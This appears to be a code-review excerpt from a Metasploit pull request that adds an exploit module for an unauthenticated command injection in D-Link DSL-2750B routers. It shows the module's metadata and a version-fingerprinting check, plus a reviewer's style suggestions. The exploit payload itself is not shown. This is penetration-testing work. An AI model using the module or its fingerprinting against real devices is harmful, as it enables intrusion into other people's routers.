modules/exploits/linux/http/dlink_dsl2750b_exec_noauth.rb

```diff
@@ -0,0 +1,98 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'D-Link DSL-2750B OS Command Injection',
+      'Description'    => %q{
+        This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices.
+        Vulnerability can be exploited through "cli" parameter that is directly used to invoke
+        "ayecli" binary. Vulnerable firmwares are from 1.01 up to 1.03.
+      },
+      'Author'         =>
+        [
+          'p@ql',  # vulnerability discovery
+          'Marcin Bury <marcin[at]threat9.com>'  # metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['PACKETSTORM', 135706],
+          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/53'],
+        ],
+      'Targets'        =>
+        [
+          [ 'Linux mipsbe Payload',
+            {
+            'Arch' => ARCH_MIPSBE,
+            'Platform' => 'linux'
+            }
+          ],
+          [ 'Linux mipsel Payload',
+            {
+            'Arch' => ARCH_MIPSLE,
+            'Platform' => 'linux'
+            }
+          ],
+        ],
+      'DisclosureDate'  => 'Feb 5 2016',
+      'DefaultTarget'   => 0))
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => '/ayefeaturesconvert.js'
+      })
+
+      if res && [200].include?(res.code) && res.body =~ /DSL-2750/ && res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
+        version = $1
+        if version >= "1.01" and version <= "1.03"
+          return Exploit::CheckCode::Appears
+        else
+          return Exploit::CheckCode::Safe
+        end
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
```

Comment:
Golfing your code:

```ruby
  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => '/ayefeaturesconvert.js'
    })

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code.to_i == 200 && res.body.include?('DSL-2750')
      vprint_status 'Remote host is not a DSL-2750'
      return CheckCode::Safe
    end

    if res.body =~ /var AYECOM_FWVER="(\d.\d+)";/
      version = $1
      vprint_status "Remote host is a DSL-2750 with firmware version #{version}"
      if version >= '1.01' && version <= '1.03'
        return CheckCode::Appears
      end
    end

    CheckCode::Safe
  rescue ::Rex::ConnectionError
    vprint_error 'Connection failed'
    return CheckCode::Unknown
  end
```

* Rescue-from-method approach is preferred as it keeps code closer to the left margin.
* `Exploit::CheckCode::x` is redundant in  `Exploit::` context. ` CheckCode::x` is sufficient.
* `&&` is preferred over `and`.
* `String.include?` is preferred over regex where regex is not required.
* `res.code.to_i == 200` is easier to read than `[200].include?(res.code)`
* Single quote `'` is preferred over double quote `"` where string interpolation is not required.
* It's nice to `vprint` the discovered firmware version.
* It's nice to `vprint` a warning when the connection fails.